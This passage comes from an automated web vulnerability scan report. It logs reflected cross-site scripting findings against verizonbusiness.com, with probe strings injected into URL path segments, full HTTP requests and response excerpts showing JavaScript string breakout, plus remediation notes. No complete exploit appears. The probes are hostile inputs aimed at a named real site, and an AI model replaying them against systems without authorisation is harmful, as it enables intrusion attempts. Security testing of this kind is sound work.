This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese9b44"%3bee3423c5215/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:53 GMT
Content-Type: text/html
Content-Length: 40704
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese9b44";ee3423c5215/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM
...[SNIP]...

1.821. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a211"%3bb9bb8b36654 was submitted in the REST URL parameter 2. This input was echoed as 6a211";b9bb8b36654 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs6a211"%3bb9bb8b36654/sb_cloud-computing-program_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/solutionsbriefs6a211";b9bb8b36654/sb_cloud-computing-program_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.822. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ddec'%3bba9a3b8f294 was submitted in the REST URL parameter 2. This input was echoed as 3ddec';ba9a3b8f294 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs3ddec'%3bba9a3b8f294/sb_cloud-computing-program_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/solutionsbriefs3ddec';ba9a3b8f294/sb_cloud-computing-program_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.823. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 927f6'%3b532bfe2ead2 was submitted in the REST URL parameter 3. This input was echoed as 927f6';532bfe2ead2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf927f6'%3b532bfe2ead2 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='%u/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf927f6';532bfe2ead2'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.824. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc630"%3b871d246c950 was submitted in the REST URL parameter 3. This input was echoed as bc630";871d246c950 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdfbc630"%3b871d246c950 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
rf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdfbc630";871d246c950";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.825. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcfe9'%3b8b602109b78 was submitted in the REST URL parameter 1. This input was echoed as fcfe9';8b602109b78 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesfcfe9'%3b8b602109b78/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40746
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcesfcfe9';8b602109b78/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.826. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 978f5"%3ba110e3078be was submitted in the REST URL parameter 1. This input was echoed as 978f5";a110e3078be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources978f5"%3ba110e3078be/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40744
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources978f5";a110e3078be/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTI
...[SNIP]...

1.827. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0bb5"%3bb33da51790e was submitted in the REST URL parameter 2. This input was echoed as d0bb5";b33da51790e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefsd0bb5"%3bb33da51790e/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40354
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/solutionsbriefsd0bb5";b33da51790e/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//
...[SNIP]...

1.828. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd27e'%3b22427f4824 was submitted in the REST URL parameter 2. This input was echoed as cd27e';22427f4824 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefscd27e'%3b22427f4824/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40352
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/solutionsbriefscd27e';22427f4824/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.829. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5167e'%3b8fe5b8ee7e3 was submitted in the REST URL parameter 3. This input was echoed as 5167e';8fe5b8ee7e3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf5167e'%3b8fe5b8ee7e3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40356
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf5167e';8fe5b8ee7e3'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.830. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b87a4"%3b8edd3e7099d was submitted in the REST URL parameter 3. This input was echoed as b87a4";8edd3e7099d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdfb87a4"%3b8edd3e7099d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40356
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
RER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdfb87a4";8edd3e7099d";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.831. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 829ad"%3bc41dc0df56c was submitted in the REST URL parameter 1. This input was echoed as 829ad";c41dc0df56c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources829ad"%3bc41dc0df56c/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:45 GMT
Content-Type: text/html
Content-Length: 40706
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources829ad";c41dc0df56c/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM
...[SNIP]...

1.832. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf

Issue detail

